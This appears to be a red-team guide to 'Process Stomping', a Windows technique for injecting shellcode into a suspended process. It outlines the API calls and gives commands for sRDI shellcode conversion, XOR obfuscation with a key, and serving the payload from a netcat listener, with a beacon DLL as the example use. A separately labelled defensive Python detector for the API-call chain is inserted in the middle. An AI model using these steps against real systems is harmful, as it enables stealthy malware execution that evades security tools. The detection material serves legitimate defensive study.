Process Stomping - Stealthy Code Injection Technique for Payload Execution

Process Stomping is a stealthy code injection technique derived from hasherezade’s Process Overwriting.

Unlike its predecessor, it injects shellcode into a targeted section of a process instead of overwriting the entire process memory with a Portable Executable (PE) payload. This makes it more efficient and harder to detect.

What is Process Stomping?

Process Stomping involves injecting malicious shellcode into a specific section of a target process, allowing attackers to execute their payload while avoiding the red flags associated with traditional injection methods. This technique leverages the following key steps:

  1. CreateProcess: The target process is created in a suspended state using the CREATE_SUSPENDED flag (0x00000004). This ensures the process does not execute immediately.

  2. WriteProcessMemory: Malicious shellcode is written into the target process's memory section.

  3. SetThreadContext: The entry point of the suspended thread is redirected to the newly injected shellcode.

  4. ResumeThread: The suspended thread is resumed, executing the injected shellcode.

How It Works

Here’s an outline of how to implement Process Stomping:

  1. Select Target Process:

    • Identify the process you want to inject into and modify global variables in ProcessStomping.cpp accordingly.

  2. Prepare Payload:

    • Compile your payload using tools like sRDI (Shellcode Reflective DLL Injection). For example:

      python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

    • XOR encrypt the shellcode for added obfuscation:

      python xor.py noRLx86.bin noRLx86_enc.bin Bangarang

  3. Deliver Payload:

    • Use a simple socket to deliver the encrypted shellcode:

      nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

  4. Inject Shellcode:

    • Use WriteProcessMemory to write the shellcode into the target process’s memory.

    • Redirect execution flow using SetThreadContext.

  5. Execute Payload:

    • Resume the thread using ResumeThread, which executes the injected payload.

Example Application

A common use case for Process Stomping is loading a beacon DLL into an executable's RWX (Read-Write-Execute) section using sRDI. This allows attackers to run malicious code while blending in with legitimate processes.

Detection Opportunities

While Process Stomping is stealthier than traditional injection techniques, it still leaves traces that can be monitored:

  • Suspicious API Calls: The combination of CreateProcess (suspended), WriteProcessMemory, SetThreadContext, and ResumeThread in quick succession may trigger alerts.

  • Behavioral Analysis: Security solutions can flag processes exhibiting unusual memory modifications or entry point changes.
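To make the first detection opportunity concrete, here is an added example of the kind of sequence rule a SOC might run over an API-trace feed. It is not code from the original post or from the Process Stomping project. The log line format, the constructed sample records, and the five-second window are all assumptions made for this example; a real sensor (Sysmon, ETW, an EDR API monitor) would need its own parser. The rule keys state on the (source pid, child pid) pair and only starts a chain when the CREATE_SUSPENDED bit is set, so interleaved activity against other children neither breaks nor falsely completes a chain.

```python
"""
Sequence detector for the four-call chain discussed above:
CreateProcess(CREATE_SUSPENDED) -> WriteProcessMemory -> SetThreadContext -> ResumeThread,
issued by one source process against the same child within a short time window.

Log line format (constructed for this example, not a real sensor format):
  <unix_ts> pid=<source pid> api=<name> target=<child pid> [flags=0x<hex>]
"""

CREATE_SUSPENDED = 0x00000004        # documented CreateProcess creation flag
CHAIN = ("CreateProcess", "WriteProcessMemory", "SetThreadContext", "ResumeThread")
WINDOW_SECONDS = 5.0                 # assumption: tunable window for "quick succession"

# Constructed sample trace: one full chain, one non-suspended start, one chain that is too slow.
SAMPLE_LOG = [
    "1000.000 pid=4242 api=CreateProcess target=5150 flags=0x00000004",
    "1000.020 pid=4242 api=WriteProcessMemory target=5150",
    "1000.025 pid=4242 api=SetThreadContext target=5150",
    "1000.030 pid=4242 api=ResumeThread target=5150",
    "1001.000 pid=7001 api=CreateProcess target=7002 flags=0x00000000",
    "1001.010 pid=7001 api=WriteProcessMemory target=7002",
    "1001.015 pid=7001 api=SetThreadContext target=7002",
    "1001.020 pid=7001 api=ResumeThread target=7002",
    "1002.000 pid=8001 api=CreateProcess target=8002 flags=0x00000004",
    "1009.000 pid=8001 api=WriteProcessMemory target=8002",
    "1009.010 pid=8001 api=SetThreadContext target=8002",
    "1009.030 pid=8001 api=ResumeThread target=8002",
]


def parse_line(line):
    """Parse one log line into a dict; return None for malformed input instead of raising."""
    parts = line.split()
    if len(parts) < 4:
        return None
    try:
        rec = {"ts": float(parts[0])}
        for kv in parts[1:]:
            key, sep, value = kv.partition("=")
            if not key or not sep:
                return None
            rec[key] = value
        rec["pid"] = int(rec["pid"])
        rec["target"] = int(rec["target"])
        rec["flags"] = int(rec.get("flags", "0"), 16)   # missing flags field means 0
        return rec
    except (KeyError, ValueError):
        return None


def detect_stomping_chains(lines, window=WINDOW_SECONDS):
    """
    Return [(source_pid, child_pid, elapsed_seconds), ...] for every (source, child)
    pair that completes CHAIN in order, starting from a suspended creation, within `window`.
    """
    progress = {}   # (source pid, child pid) -> (index of next expected call, chain start ts)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["pid"], rec["target"])
        api = rec["api"]
        if api == "CreateProcess":
            # Bitwise test: CREATE_SUSPENDED may be combined with other creation flags.
            if rec["flags"] & CREATE_SUSPENDED:
                progress[key] = (1, rec["ts"])
            else:
                progress.pop(key, None)   # a normal start cannot begin this chain
            continue
        state = progress.get(key)
        if state is None:
            continue
        idx, start = state
        if rec["ts"] - start > window:
            del progress[key]             # too slow for this rule; drop the partial chain
            continue
        if api == CHAIN[idx]:
            idx += 1
            if idx == len(CHAIN):
                hits.append((key[0], key[1], round(rec["ts"] - start, 3)))
                del progress[key]
            else:
                progress[key] = (idx, start)
    return hits


if __name__ == "__main__":
    for src, child, secs in detect_stomping_chains(SAMPLE_LOG):
        print(f"suspicious chain: pid {src} -> child {child} completed in {secs}s")
```

Run as-is, the script reports only the 4242 → 5150 chain; the 7001 pair never started suspended, and the 8001 pair took seven seconds, which falls outside the default window (widening the window to ten seconds flags it too). Debuggers and some launchers legitimately combine a suspended start with SetThreadContext, so in production this rule is best paired with the second opportunity above, for example by also requiring that the written region overlaps the image section that the new thread context points into.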

Caveats

  • Selecting an appropriate target process is critical for successful execution.

  • Ensure that your DLL payload does not include a User Defined Reflective Loader, as this could interfere with execution.

Disclaimer

This guide is for educational purposes only. Neither the author nor contributors are responsible for any misuse of this information.

Credits

This technique builds upon concepts shared by Aleksandra Doniec (@hasherezade) and Nick Landers, whose work has significantly contributed to understanding advanced code injection methods.

By following this guide, security researchers and red teamers can better understand Process Stomping and its implications in modern cybersecurity. You can learn more and download Process Stomping on GitHub.
